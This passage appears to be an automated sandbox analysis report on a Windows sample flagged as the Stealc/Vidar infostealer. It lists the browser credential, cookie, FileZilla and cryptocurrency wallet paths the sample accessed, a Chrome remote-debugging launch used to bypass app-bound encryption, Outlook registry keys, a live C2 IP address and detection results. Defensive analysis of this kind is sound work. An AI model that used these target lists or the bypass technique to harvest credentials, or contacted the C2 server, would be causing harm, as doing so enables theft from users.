Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: HrxOpVxK5d.exe PID: 6396, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected Stealc

Source: Yara match	File source: 0.2.HrxOpVxK5d.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HrxOpVxK5d.exe.49e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HrxOpVxK5d.exe.4900e67.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HrxOpVxK5d.exe.4900e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HrxOpVxK5d.exe.49e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HrxOpVxK5d.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HrxOpVxK5d.exe PID: 6396, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: HrxOpVxK5d.exe PID: 6396, type: MEMORYSTR

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D050D60 sqlite3_bind_parameter_name,	0_2_6D050D60
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D050C40 sqlite3_bind_zeroblob,	0_2_6D050C40
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF78EA0 sqlite3_clear_bindings,	0_2_6CF78EA0
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6D050B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6D050B40
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_6CF76410 bind,WSAGetLastError,	0_2_6CF76410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Create Account	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	144 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	31 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
HrxOpVxK5d.exe	53%	ReversingLabs	Win32.Trojan.Stealc
HrxOpVxK5d.exe	46%	Virustotal		Browse
HrxOpVxK5d.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\chrome.dll	4%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://77.220.212.32/241bc8c289ca83f4/msvcp140.dll$	0%	Avira URL Cloud	safe
http://77.220.212.32	0%	Avira URL Cloud	safe
http://77.220.212.32/eb51242cada87444.phpecoin	0%	Avira URL Cloud	safe
http://77.220.212.32/241bc8c289ca83f4/vcruntime140.dll	0%	Avira URL Cloud	safe
https://permanently-removed.invalid/OAuthLoginP	0%	Avira URL Cloud	safe
http://77.220.212.32	4%	Virustotal		Browse
http://77.220.212.32/241bc8c289ca83f4/vcruntime140.dll	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
plus.l.google.com	142.250.186.142	true	false	high
play.google.com	172.217.18.14	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.244.18.27	true	false	high
www.google.com	216.58.206.36	true	false	high
sni1gl.wpc.nucdn.net	152.199.21.175	true	false	high
bzib.nelreports.net	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731123216540&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
http://77.220.212.32/241bc8c289ca83f4/vcruntime140.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0	false		high
https://sb.scorecardresearch.com/b?rn=1731116851926&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1A1E8714CE116135161B9226CFE060A6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731123216782&w=0&anoncknm=app_anon&NoResponseBody=true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	EBFBKKJE.0.dr, Web Data.15.dr, JJJJKEHC.0.dr	false		high
https://duckduckgo.com/ac/?q=	HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, EBFBKKJE.0.dr, Web Data.15.dr, JJJJKEHC.0.dr	false		high
https://permanently-removed.invalid/oauth2/v2/tokeninfo	msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ntp.msn.com/0	000003.log9.15.dr	false		high
https://ntp.msn.com/_default	QuotaManager.15.dr	false		high
http://anglebug.com/4633	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Yx	chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/284462263	msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ntp.msn.cn/edge/ntp	2cc80dabc69f58b6_1.15.dr	false		high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/G	chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000008.00000003.1329800088.00000F9C025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1329018205.00000F9C03178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1328904481.00000F9C0299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1327349456.00000F9C0325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1326757189.00000F9C030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1333048708.00000F9C03360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1327419460.00000F9C03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1328883235.00000F9C02EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1327322112.00000F9C0320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1330145538.00000F9C03308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1328927512.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1327369398.00000F9C030F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
https://google-ohttp-relay-join.fastly-edge.com/J	chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7714	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.instagram.com	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
http://77.220.212.32	HrxOpVxK5d.exe, 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.220.212.32/241bc8c289ca83f4/msvcp140.dll$	HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000008.00000003.1329800088.00000F9C025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1333048708.00000F9C03360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1330145538.00000F9C03308000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Q	chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Hx	chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
https://outlook.office.com/mail/compose?isExtension=true	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
http://anglebug.com/6929	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5281	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i.y.qq.com/n2/m/index.html	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	HrxOpVxK5d.exe, 00000000.00000003.1578461410.0000000023699000.00000004.00000020.00020000.00000000.sdmp, GHJJDGHCBGDHIECBGIDAEHCGDG.0.dr	false		high
https://www.deezer.com/	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
https://issuetracker.google.com/255411748	msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web.telegram.org/	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
https://permanently-removed.invalid/oauth2/v4/token	msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 00000008.00000003.1349125008.00000F9C02EB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1510501728.000015280237C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000008.00000003.1329800088.00000F9C025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1329018205.00000F9C03178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1328904481.00000F9C0299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1327349456.00000F9C0325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1326757189.00000F9C030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1333048708.00000F9C03360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1327419460.00000F9C03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1328883235.00000F9C02EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1327322112.00000F9C0320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1330145538.00000F9C03308000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1328927512.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1327369398.00000F9C030F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, EBFBKKJE.0.dr, Web Data.15.dr, JJJJKEHC.0.dr	false		high
https://issuetracker.google.com/161903006	msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	EBFBKKJE.0.dr	false		high
https://excel.new?from=EdgeM365Shoreline	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
https://permanently-removed.invalid/OAuthLoginP	msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://permanently-removed.invalid/chrome/blank.html	msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3078	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5375	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
